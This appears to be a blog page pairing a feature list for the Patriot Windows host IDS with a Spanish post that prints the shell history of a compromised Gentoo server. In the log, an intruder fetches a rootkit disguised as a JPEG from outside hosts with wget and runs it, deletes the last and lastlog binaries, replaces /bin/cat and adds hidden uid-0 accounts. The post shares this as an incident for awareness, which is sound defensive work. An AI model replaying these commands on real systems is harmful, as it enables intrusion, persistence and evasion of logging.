Patriot Host IDS

Patriot is a ‘Host IDS’ tool which allows real time monitoring of
changes in Windows systems and Network attacks.

Patriot monitors:
Changes in Registry keys: Indicating whether any sensitive key
(autorun, internet explorer settings…) is altered.
New files in ‘Startup’ directories
New Users in the System
New Services installed
Changes in the hosts file
New scheduled jobs
Alteration of the integrity of Internet Explorer: (New BHOs,
configuration changes, new toolbars)
Changes in ARP table (Prevention of MITM attacks)
Installation of new Drivers
New Netbios shares
TCP/IP Defense (New open ports, new connections made by processes,
PortScan detection…)
Files in critical directories (New executables, new DLLs…)
New hidden windows (cmd.exe / Internet Explorer using OLE objects)
Netbios connections to the System
ARP Watch (New hosts in your network)
NIDS (Detect anomalous network traffic based on editable rules)

Patriot NG 2.0: Protección frente ataques MITM from Jesús Moreno León on Vimeo.

Homepage: http://www.security-projects.com/?Patriot_NG

Otro Servidor Comprometido

A veces me pregunto como es que  Consultoras de TI , se avientan  a instalar linux, en este caso gentoo

Y son vulnerados/hackeados de una manera tan  “tonta”.

Esta bien que linux sea “seguro”, pero estan de acuerdo que se tiene que  configurar ciertas herramientas para prevenir este tipo de ataques y  peor aun que te obtengan root en el sistema.

Este log lo obtuve anoche con el permiso del administrador de la red, un servidor comprometido

#Aqui los logs

id
w
cat /etc/issue
cat /proc/infocpu
cat /proc/cpuinfo
php -v
cd /dev/shm
ls
pwd
wget linux2.go.ro/rk.jpg
ls
wget linux2.go.ro/rk.jpg
ls
w
uname -a
wget linux2.go.ro/rk.jpg
wget sentimente.zapto.org/rk.jpg
ls
pwd
pwd
wget 210.243.4.4/~local/rk.jpg
ls
tar zxfv rk.jpg
./setup teiubesccamy 20
chmod +x *
./setup teiubesccamy 20
rm -rf /usr/bin/last
rm -rf /usr/bin/lastlog
last
lastlog
mv /bin/cat /bin/cat1
nano /bin/cat
nano /bin/cat
id
pico /bin/cat
ls
./setup teiubesccamy 20
wget http://nasa.undernet.nm.ru/pico.tgz
w
/usr/sbin/useradd -o -u 0 Zomby
/usr/sbin/useradd -o -u 0 ZombyNebunu
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/userdel Zomby
/usr/sbin/userdel ZombyNebunu
/usr/sbin/useradd -o -u 0 Petru
/usr/sbin/useradd -o -u 0 Petru85
/usr/sbin/userdel Petru
/usr/sbin/userdel Petru85
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/useradd -o -u 0 zomby85
ls
cat /etc/issue
cat /etc/passwd
cat /etc/passwd
passwd zomby85
/usr/sbin/userdel zombynebunu
/usr/sbin/userdel zomby